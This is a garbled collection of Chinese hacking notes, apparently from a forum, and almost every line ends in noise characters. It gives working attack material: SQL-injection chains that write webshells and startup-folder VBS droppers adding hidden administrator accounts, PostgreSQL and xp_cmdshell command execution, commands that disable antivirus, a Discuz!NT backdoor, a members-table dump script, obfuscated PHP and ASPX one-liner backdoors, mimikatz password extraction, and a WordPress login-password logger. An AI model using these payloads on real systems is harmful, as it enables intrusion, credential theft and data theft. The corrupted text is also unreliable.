! R, D3 K9 \: g% `' r   而终端所对应的服务名为:TermService
/ R  U' c) Z3 z. C' Y' R: p第二步:用netstat -ano命令,列出所有端口对应的PID值! . c% L$ ?; @6 Y+ x5 m( z
   找到PID值所对应的端口7 b& k  K% }) N- Q- O$ q
! A3 f1 N7 m2 Q! P8 V" X
查询sql server 2005中的密码hash
% ~5 X- P7 P2 H1 WSELECT password_hash FROM sys.sql_logins where name='sa'
+ R& \% x, z$ m0 }* e, L% f' `  X4 ISELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, O( u) \- O9 H4 [
access中导出shell& r+ [% y  }2 r
: h% _0 \+ p) Q
中文版本操作系统中针对mysql添加用户完整代码:$ h1 s( h  `/ P$ b

7 {% w7 h' K; s7 v3 G3 o" ]use test;
; l" B6 x( Q. A5 I5 N! Jcreate table a (cmd text);+ ^: L* x' B  d- }: u! o
insert into a values ("set wshshell=createobject (""wscript.shell"") " );! _1 K8 k6 w7 q, s! W3 K3 T( F
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
5 B6 x& E8 Y2 {% A- H% l, e7 C% y. Rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
+ M: A9 a  ]- x9 j  }, ^% \select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";) ~, b! R1 m3 L' O
drop table a;
& \. p: E2 a4 J: i! e, w
: \( E% g0 O5 T英文版本:
) T: T: x" D; z9 t, Y* H9 O& R! z; P$ v% V7 b
use test;+ }, T4 ?! d4 K% ^+ d7 H
create table a (cmd text);
" @! D/ J, i# Winsert into a values ("set wshshell=createobject (""wscript.shell"") " );
: s$ N6 k# o  k$ b/ g3 A$ d& E+ N/ I, sinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
  ?, q  ?6 F& w0 o" ]; X" [4 p3 Q3 Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
7 P! w9 C/ |$ m& P0 Vselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' s: C* f! g% g* ]drop table a;5 L% `3 f. ]- s. _+ w4 X/ @# q
1 @( r6 A3 B" _* Q' v* O
create table a (cmd BLOB);2 W& [! K% M7 H0 R1 A
insert into a values (CONVERT(木马的16进制代码,CHAR));% m# t8 q( c- c5 f1 G
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'/ t/ a7 Z( q7 l
drop table a;
0 B0 M& q. r6 p6 M3 k. f
3 V' p- w4 s% E+ p) G记录一下怎么处理变态诺顿
- C  B8 u$ J/ F# g( c% Z: a查看诺顿服务的路径
0 G! ^( d1 ~& a3 bsc qc ccSetMgr" H- J. D- m$ s4 F3 b: j' p
然后设置权限拒绝访问。做绝一点。。, x% }3 f) R2 z' v$ k% A. s
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 }6 x1 I9 H4 H1 \8 hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"6 R7 W: E& Z' g; l- X6 u! G* G2 ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators7 e0 y( `& c( k" [( x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
8 W: p. }4 F: E) X: r0 i
1 R2 Q/ K4 h0 y* u1 O, ?. O! N) f2 I然后再重启服务器+ ~( |& r# s& t9 H) K2 L0 f! q, T
iisreset /reboot
" g, q: @9 c' v" n5 r5 h这样就搞定了。。不过完事后。记得恢复权限。。。。
, o1 O* Q7 U5 m; y- kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
. P  g0 G2 r2 l  s: A- \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
0 @2 s1 O( B8 X3 acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F( ]3 i4 N% @( h$ Q6 B7 x) ?( o. C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
0 m% K" ^9 ?) E0 X5 k7 I% l6 A  N) ?SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 W$ R2 f6 C3 j' V, N8 }
. D1 q) o" P; _8 Y; E
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
* O! R) g" `  g3 u+ H+ |" ~& S" o
postgresql注射的一些东西0 o$ ?. T, Y5 x, n7 w
如何获得webshell
% y& z2 s$ c6 A, N, _& Shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); * M8 {  O4 j. l' k
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
6 P# }  I9 I, V: b5 n, Fhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
7 q+ X8 f: V6 P4 t! h3 T* u' j如何读文件
5 c4 f) ]' _4 r) Q  ghttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);  z+ J( w  A2 ?0 Z+ O( F
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;7 E9 {: U, y. y9 S: u& z5 Q) l" u
http://127.0.0.1/postgresql.php?id=1;select * from myfile;" |% u4 T3 _- Z- z$ |' _: E8 j2 }

, ?+ n( ?. W  i3 F  R& Vz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- \" q0 l% }- k3 d) n( @
当然,这些的postgresql的数据库版本必须大于8.X3 L( {, I  u* E0 N
创建一个system的函数:
& P9 M  M' K5 e, e  OCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
# ?1 d( l0 d) H$ d2 c
# w, ~' ~% S) ?; V$ P创建一个输出表:4 k7 E0 E2 v6 F2 z! J* [% z
CREATE TABLE stdout(id serial, system_out text)  K$ o& G, i- _) o$ [, `, u
3 X4 A  x& |  {& x0 h, n' b
执行shell,输出到输出表内:
1 i5 s+ G8 a' J" o( @SELECT system('uname -a > /tmp/test')# h3 ?) u; Q3 D, U& N

+ Y5 S' W8 P) f  kcopy 输出的内容到表里面;
/ |5 R4 q* {* TCOPY stdout(system_out) FROM '/tmp/test'& s% R# G( Q! [  x) b
, g5 E0 ^7 X3 O
从输出表内读取执行后的回显,判断是否执行成功7 l" S4 r- _8 ~! @# n! Y& b+ e

- P5 D: L9 ~# o' zSELECT system_out FROM stdout6 l$ L, i4 W# V9 P8 @2 J; s
下面是测试例子
$ S9 q& F7 g) i* Y, X# }' ]- Q1 ^/ s, p; U/ h, G; u- V: z
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 5 D- s" a; [* @+ w. z' ]
" ~8 y, O- o9 a2 L3 c. O
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
; `2 O+ ?$ J# w; }; A* z+ GSTRICT --
/ A4 ]2 Q9 `1 V/ ?/ F* b! V, H5 A* j1 R$ S
/store.php?id=1; SELECT system('uname -a > /tmp/test') --4 t" G9 K% x4 O8 k

  j. {8 i( l$ x4 h/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
7 _% g- f0 V+ x% z
* n. A; d0 j) k) o! l. S/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--3 }- f1 J. z, n4 S& f, C
net stop sharedaccess    stop the default firewall
4 I. @, ^4 ]  m2 }) i# ]- Enetsh firewall show      show/config default firewall
0 G& P! n% a, k9 v4 L& ~! _netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall- f. |9 o1 T0 [3 D& n& }# _9 U
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
9 U& E! f( s7 `; d# d' [9 v修改3389端口方法(修改后不易被扫出)
4 g8 `2 k) {2 K6 w- b9 D( Z修改服务器端的端口设置,注册表有2个地方需要修改( ~* w+ A! S( [, W  l8 Q

/ |7 X# B4 B# [* }[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
  F9 Z4 [; y% I0 C% FPortNumber值,默认是3389,修改成所希望的端口,比如6000& f1 n0 B4 M' @4 y8 U( l+ {7 a& z

3 v/ I1 z; @- y第二个地方:
  c0 N6 ]+ l8 |- G( l[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] * V/ c6 T0 c. D) r( y0 q
PortNumber值,默认是3389,修改成所希望的端口,比如6000
, `- z+ l& d3 a2 W: g$ L1 L5 E7 ^2 \9 e& s9 u- }: X
现在这样就可以了。重启系统就可以了
0 i, r! F) j4 B1 v9 C
( p8 O# ~* w1 x$ k3 N查看3389远程登录的脚本" q5 O4 C+ S$ _/ v3 f6 C* G4 A; d  o
保存为一个bat文件
6 S  I3 l8 @. Jdate /t >>D:\sec\TSlog\ts.log
% K5 ~% D2 ~: qtime /t >>D:\sec\TSlog\ts.log
5 _' t& X$ d& h. Z) f6 m/ o  Tnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log8 B' M( k- P. ~" W+ h* q8 a2 b( a
start Explorer
8 h) J4 M$ a' d0 o; ~
  n- F" H$ @8 W) X' K* c7 Fmstsc的参数:
+ `8 y3 O1 u  ^$ c# W
) _$ W% w% I' V4 ^远程桌面连接
. c& v4 c) @4 p' H9 Q3 F+ @7 U
: `- i' ~. @6 q9 e4 V8 xMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
- P& {  h# l/ E7 c1 S1 _$ N* H  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
3 X1 ]4 a- A& b
' E- L* @8 ]# F( R<Connection File> -- 指定连接的 .rdp 文件的名称。
0 a4 V4 x' N) q
2 F8 }# K/ G% H* @3 T/v:<server[:port]> -- 指定要连接到的终端服务器。
( k8 o) _) g6 L% O3 D3 l. g; q3 \8 g: q
/console -- 连接到服务器的控制台会话。6 u( N, f( _4 I1 u  @* G1 Q0 I

- p+ A; J/ ~; `0 j/ f/f -- 以全屏模式启动客户端。
3 ?$ W9 K5 j) V: C
& p" N4 @( n" L% C! _5 P/w:<width> --  指定远程桌面屏幕的宽度。
! d6 w% x, Q6 m6 k* C* Q
: \# k0 R& p1 g7 }/h:<height> -- 指定远程桌面屏幕的高度。
. G' H5 Z" b; l6 V% n$ o
* p! S/ Q5 z7 i- j2 j/edit -- 打开指定的 .rdp 文件来编辑。
) {4 m( ~  P9 y9 W7 l! s! K6 {% t6 o' n* F8 S: M
/migrate -- 将客户端连接管理器创建的旧版, e* h8 j6 s+ D, v5 J
连接文件迁移到新的 .rdp 连接文件。
2 Z7 q5 w2 h2 K: e2 @0 X" S+ [  g) {: P7 q8 f9 O: C
8 j! X. B1 W" B1 c1 l  q
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
1 i& u% M/ Z) V( b4 z1 Nmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
% a2 {; B% }) s  ~* T. k4 P
& c! Z7 d+ W, R+ b) g8 C" j& S命令行下开启3389
1 P& h; j" u9 v; X! L. ]. dnet user asp.net aspnet /add
; R( e+ I% W( }0 ?, ~/ j5 E0 a; a% Nnet localgroup Administrators asp.net /add
0 v; q' M" g, P6 P/ Dnet localgroup "Remote Desktop Users" asp.net /add
# v  c2 `$ H) Z& Yattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D6 R& P- L& s' M" \8 k+ l
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0* [9 v$ Z% ?- V4 U4 C- W3 I: c
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1$ r, M+ V0 s' z8 X& R) n  x3 q
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 y' C, P! m& [9 D: J+ Wsc config rasman start= auto& W/ T' x, Y/ r; j6 [3 ~+ T  m
sc config remoteaccess start= auto
  Q. ^2 A8 u! {$ K8 rnet start rasman; I, f% r' t6 h5 u$ D+ e
net start remoteaccess
$ Q! M4 b# W$ r" S$ pMedia6 s4 Z1 u0 F! S" _9 p2 F! w9 n
<form id="frmUpload" enctype="multipart/form-data"
' ]. Q5 X& T4 \5 ]# P& }8 f. W: N* @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
7 v* Q0 y2 z! A, \' \$ Q0 e6 y! j<input type="file" name="NewFile" size="50"><br>
% U4 y1 \6 `% I# O9 s# ~<input id="btnUpload" type="submit" value="Upload">, F+ b- k4 h. D
</form>
! Z/ b$ R7 X$ E; J1 `
  Z6 K" w3 f! o  q! p; qcontrol userpasswords2 查看用户的密码
6 D4 S. H" n( F* e: raccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径2 @5 Z! |" d+ ^2 {5 h" [
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) j" ^% H* F3 k( o: I
- I# j& Q* g$ X( r! Y141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:( b9 l2 `4 e4 ^' y! S* r
测试1:
; z9 n' V* Q+ P, e. P5 e( q3 G5 dSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# n2 ?4 o* Z! B% C6 U9 s: W% M" u3 ^% D, @3 h- d  v  ~; \
测试2:
7 y# k9 t5 F( B5 [7 A* `- L  L  f
create table dirs(paths varchar(100),paths1 varchar(100), id int)" s1 r5 A" k; g4 v& S, K9 c
4 j2 h  u- R0 e
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--% A( e( E& c( r( @# \

. ]5 K. @2 }- W% r/ N1 y7 ~SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1% u& S; U6 `! R) c$ B
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令! v& O2 _  o% n( ^$ u
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;/ u! W* `; I5 `4 ?8 ^
net stop mcafeeframework; Z. ?3 S/ O7 Q  e8 m
net stop mcshield' f2 \  V( a5 U6 |) p! C
net stop mcafeeengineservice2 t$ {3 V! N. s
net stop mctaskmanager
( \4 {# ^3 o, R) |http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
2 |. t( i  z$ N$ k
% g1 v) s/ y& A  VNCDump.zip (4.76 KB, 下载次数: 1)
( W- m9 |5 r" w8 I密码在线破解http://tools88.com/safe/vnc.php- D# X) ~% j: _7 v. f
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
6 b6 e6 o8 s! S1 M" R  `
: O, ]1 k1 a( kexec master..xp_cmdshell 'net user'
: |/ Q( O) a2 W) }; ?mssql执行命令。
1 k+ Q  d9 I% ]- D1 j获取mssql的密码hash查询" N- }! T& m+ B
select name,password from master.dbo.sysxlogins- T) C5 x, A+ z. M2 O  V" Q

1 E8 u4 r6 Q/ I3 Ibackup log dbName with NO_LOG;
5 Z; M- K- i' t; a! fbackup log dbName with TRUNCATE_ONLY;
( X& q" ?5 w7 J3 hDBCC SHRINKDATABASE(dbName);. F" X6 A5 ~3 I# L, N5 q; s$ G
mssql数据库压缩
/ _- N7 e9 }: @8 x; l3 t, m4 y  ^7 b: j5 |. U& j! v( J" Y* O
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK+ \; t  n, F4 x; A9 D4 z" h4 c( f
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
, n3 n, {5 @0 }) v: ]) l0 P5 \
2 d: {: l/ O& dbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
0 s- B' V/ A& t5 G9 @, i备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak3 r% X# M# x4 c
- n& V0 `" n9 T$ V' A
Discuz!nt35渗透要点:0 x* U' _; t1 l( U3 F* ?+ J
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
# z2 S6 p# j! Q% J(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
, U3 b; R$ u! p7 X( s+ \4 y(3)保存。
" s3 }, _7 G, r# }(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 z5 [- H, Y2 I3 Y. Vd:\rar.exe a -r d:\1.rar d:\website\! S& m3 z# s5 Z2 U* ~7 @$ j
递归压缩website
# S* t3 {. N& U, i1 w注意rar.exe的路径
& [# S! X) {& W) K0 z5 e9 I: Y! q
8 k- F  X/ I' i5 U<?php
* c& t( h; Y5 l
' h+ u' `& P! b  X1 G$telok   = "0${@eval($_POST[xxoo])}";! F7 K5 @2 y* l  f
) \* r* Q+ }0 |* n
$username   = "123456";6 k" s( b( l! j8 \# e, ~, K

5 w4 H! l4 r' D. [$userpwd   = "123456";
7 I" N; ~* s$ ~/ ?: E
6 f. {3 c! Y; ]/ U; m, N$telhao   = "123456";
! Z9 e4 \+ B; W0 S" {* L; w5 U: S2 @" H# ~, B
$telinfo   = "123456";3 S5 ~, ?3 o' }/ @& {. q

9 i5 V# Z3 I. s: M2 D5 C?>: P& T* c3 i9 m7 W) ~1 B6 h
php一句话未过滤插入一句话木马6 h2 A: Q% e5 Q+ n" d/ x% j

- K  g4 c0 C1 g* v" `站库分离脱裤技巧. T# S) m/ @0 Y+ \: L7 r! j
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'& w$ ]8 }4 q. I0 }# ?
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
) u: j! |6 P6 r  |4 E6 w) H7 B( y条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。* ?+ x! G3 H, @  O
这儿利用的是马儿的专家模式(自己写代码)。
7 F, i$ H. Y7 \0 w8 d4 Vini_set('display_errors', 1);
, L3 |! v% r7 p9 H9 S+ M3 |2 Bset_time_limit(0);
; w9 }# l, K  \+ f! {4 P3 qerror_reporting(E_ALL);$ {" a8 j0 H' H' X9 B" F' ]
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());  ?+ b/ G, U1 J& ]; B) L
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());4 A3 o: M. K( R3 [# }$ ?
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());! g$ |1 b# F  t8 Z/ H/ `$ q+ `
$i = 0;
% F& K! j5 G# |  N) \4 y$ ~2 J$tmp = '';" m# Z( `9 @! g
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {" R/ \' s4 G4 w: L1 z6 o
    $i = $i+1;# K8 v1 Q0 s4 l* s2 b4 i2 [
    $tmp .=  implode("::", $row)."\n";
8 c) x& F/ t* [( F$ V2 ]! P    if(!($i%500)){//500条写入一个文件9 U  z7 F4 x3 S1 Y4 b7 {
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
8 ]* ~, ~* f1 T* w3 v  z: A        file_put_contents($filename,$tmp);
. i4 d6 z  V( w3 S* B+ N4 d+ s        $tmp = '';
+ K% N4 r+ ~8 o    }( _# z. D* d4 Y0 N/ L
}
( |+ R" Z( c2 qmysql_free_result($result);
5 i3 H1 L2 y! z% p% r1 ?- |% U* C; t* U$ |& i0 w
% @8 Q$ B! x8 C, f7 h( F8 L: p
& n% ]5 T3 q, W/ j( p( j
//down完后delete2 p7 Y' Q* D1 ~9 `" V
- Z5 N2 w/ y# s" Q9 P( a
: @3 y  I. s5 ?3 ~. \4 J9 A
ini_set('display_errors', 1);
# B3 a/ R( v0 f4 terror_reporting(E_ALL);
. P& u& G' Z- H7 ?+ R$i = 0;/ c- _! ^: m$ V; Y
while($i<32) {
& t; n, t  e1 L" m2 [1 R3 S5 S    $i = $i+1;
$ Y5 }- I% I" N        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';" S. ?+ {" T" Z& h1 ^
        unlink($filename);; \" f8 L4 K* a% ], C6 O, w) Z
} 9 |) t6 W( U, n: J" F) s  ~. M" g4 f, h
httprint 收集操作系统指纹
' q  R0 O9 G& n8 J% _4 @( m1 X扫描192.168.1.100的所有端口2 H/ f7 Y  w. v
nmap –PN –sT –sV –p0-65535 192.168.1.100: E: [. N0 L+ ~
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
* q* {5 b5 n  _& _6 V, J" Thost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
! T) Z" `0 D- WNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host' K2 E( Q$ L6 O" `6 b/ |$ \

$ ?" u$ o* Y( w# IDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)8 @' K, H, \! c( H4 M2 f

6 U4 Y  K# l8 W5 ~' z* K  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% }& P# U* v0 j5 b  t
$ \( F+ l; s! |# z" ^- j
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x+ b* M3 F  U+ @" j& v9 y  C
4 @' v- V' @, {1 j  T6 c( n
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ C/ c1 k1 n  Q& D8 ~$ b1 F; R' r. ~5 I2 ?
  http://net-square.com/msnpawn/index.shtml (要求安装)* x1 n0 i4 o) c6 k9 z
% h( W+ H" V5 {  Y& V$ t
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)& t9 K1 q$ f, U# G

# L9 O- x: e. }: w  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)) g( `' k5 f0 Z9 X$ D
set names gb2312& ^3 c0 C% }& T
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
: k# H+ ]* c; l0 z1 ?* N  o; g$ I% O$ Q
mysql 密码修改% l1 @4 x: p' s. u2 k2 \; P
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” 9 Q  O- x" O9 j- H& b. v. ~
update user set password=PASSWORD('antian365.com') where user='root';
: c6 T- W8 ?6 g! v# _. P# Eflush privileges;
6 V4 h& p6 V5 B高级的PHP一句话木马后门
! n! r3 i+ b1 w- H  H, p, C0 N" q) q
8 a1 j! X! A% t. K入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀7 C! K( u9 E# G

" X/ W7 O+ n7 t. |) P+ F2 h. r: o1、/ \( k% o( X0 S$ ~3 W6 j6 V  J
! u7 ~* P4 j/ B
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";" f$ [! M& T1 a5 V, @/ y
9 d$ j* N: ?$ @. W1 o9 i7 q4 ^
$hh("/[discuz]/e",$_POST['h'],"Access");
$ V0 k$ o. u( w3 Q1 _: g( l* m7 w5 z3 V1 U4 G  C. S# t
//菜刀一句话
  R9 |, T" L# B2 j+ F! I: A* b! ?. j; W5 [0 t
2、- x1 s% o/ ^/ s, {7 J8 G

9 J' d( n% v/ V0 y" t  o$filename=$_GET['xbid'];
8 f2 M! z  `# X
* v3 j" B3 @1 `. A8 |/ binclude ($filename);
- \  J& p3 c; O7 V0 \% r4 }9 W6 {: i, f/ K3 \
//危险的include函数,直接编译任何文件为php格式运行
& j" i7 D, d1 Y9 M* C& d& o4 M0 x% [9 ]
3、
3 v& ]% R- s( F7 A
+ {  Q' {+ t# z1 z0 z" B6 ^$reg="c"."o"."p"."y";7 M! _  Q% K! t3 c6 I

  E$ q8 V: p2 [8 U) \$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);9 i0 `& X2 ?8 g4 g

! P" z  {$ L6 _/ J  y//重命名任何文件6 }/ s1 w: V4 l$ k' M
- _- r+ V* l/ [2 C9 q! b
4、: u' B* _2 n) y* i! Q6 \: u' ]
1 _4 }2 x4 k% ?& _
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";, V( U9 V# C7 q% \+ Q

. a, P. E# L6 s0 T) L& V$gzid("/[discuz]/e",$_POST['h'],"Access");' U* x2 \; n& s/ ^& m6 c3 M

. S" q4 e# Y8 q//菜刀一句话6 f' o4 s: @$ K( Z. F
3 x0 V* I! N- P. `( A
5、include ($uid);1 {5 V& s) U8 x$ `7 R! y( _: h

/ K6 W+ p, ~7 e+ t//危险的include函数,直接编译任何文件为php格式运行,POST
2 @8 F4 ^1 u0 H7 K  I% s7 V& w/ q4 y2 M

5 N+ n! @/ C& E* P& a6 e//gif插一句话' s0 B' }' _8 v! b: X
7 a  l) S6 h1 X' }# H: R
6、典型一句话% j5 L  ?& x1 S9 d. C9 D  P  M: H

6 k3 ^! D9 d6 N) [" l程序后门代码. m% e, N+ `2 O( S' C: X' Z9 T
<?php eval_r($_POST[sb])?>
) H, z  r$ a- a$ I程序代码
: r8 j- N2 \& c7 T6 |4 i<?php @eval_r($_POST[sb])?>
$ n8 y% ^  C2 \( G$ m* J4 N( E. q- q//容错代码. ^8 w" X: I. a  @7 O
程序代码
! U- B8 _9 t8 _8 U<?php assert($_POST[sb]);?>
! x. I& D0 a) Z0 Y) m# s//使用lanker一句话客户端的专家模式执行相关的php语句
5 u1 i# p+ L: i6 K% y2 q1 ^程序代码
1 l; [0 v% f& ?% ^1 M( i$ J<?$_POST['sa']($_POST['sb']);?>  W6 o. x" ~! T3 i
程序代码
6 s  Y  ~/ @7 G6 b- `: F) p<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>9 R- R: t9 X5 ?. D1 G  l
程序代码+ E) N0 r- g- ?
<?php9 E. A. @. I, F; c9 E  M
@preg_replace("/[email]/e",$_POST['h'],"error");
4 e& M& v$ V9 {?># J" W$ Z. |4 P9 L! W2 f* S: v
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入' R* U+ D& d, i( Q& g8 z
程序代码
6 q& o2 y# S! D+ z, U* m8 v<O>h=@eval_r($_POST[c]);</O>
4 v& w, ]2 @! _4 a, V程序代码
# p" [- v' B, r' j* C+ Y) h<script language="php">@eval_r($_POST[sb])</script>
6 d2 @: {5 \9 ?# n: m4 s5 z//绕过<?限制的一句话! L4 j9 o4 W: Y

/ j2 _$ h6 R; i8 [' H% `/ X2 r* g& ghttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
! V. z! ]6 n# b2 F2 H; u详细用法:& ~8 M* D1 ?" `. ^2 j$ K
1、到tools目录。psexec \\127.0.0.1 cmd$ d( ]* Z) ~6 y7 e
2、执行mimikatz
; X1 ?) P4 c4 {* h/ m& b3、执行 privilege::debug
5 Y: f: d: p. a! u5 Y4、执行 inject::process lsass.exe sekurlsa.dll
9 H3 P8 W7 C  f+ ]5、执行@getLogonPasswords2 t  g. d! ^( `: b! S: A
6、widget就是密码
7 \- C! _" ?6 K2 p" G# N' G) g: d7 O7、exit退出,不要直接关闭否则系统会崩溃。) M+ P) \% |& k/ w

. O: F" c5 T& A9 zhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面+ q. C* H. @/ V# J2 {6 r  p+ C/ p0 d0 ]

) T& Z! L/ s+ I4 H2 }0 a自动查找系统高危补丁
+ f# ?) a* G% D0 }- q4 P' Q) O+ Gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: ?, {" }  X3 Z/ r5 E/ O% m
, {; H0 c* f( m突破安全狗的一句话aspx后门
- a4 m0 ^% T2 F7 ^1 u% }; ~<%@ Page Language="C#" ValidateRequest="false" %>
: y* N) ]2 Y. K/ c$ o3 V: }<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>8 z& Q) ]$ t$ f1 G7 y
webshell下记录WordPress登陆密码+ c4 w& E; g( q6 s+ @9 r8 p, F; u
webshell下记录Wordpress登陆密码方便进一步社工9 u2 k; Z$ O' e0 x* G9 C
在文件wp-login.php中539行处添加:  X$ l" O' n  M, {4 Z8 [
// log password7 s* ^/ A4 o: y, S
$log_user=$_POST['log'];
7 q8 F, V+ H+ {% S: @, p  f$log_pwd=$_POST['pwd'];: n4 G8 G/ _5 c& _
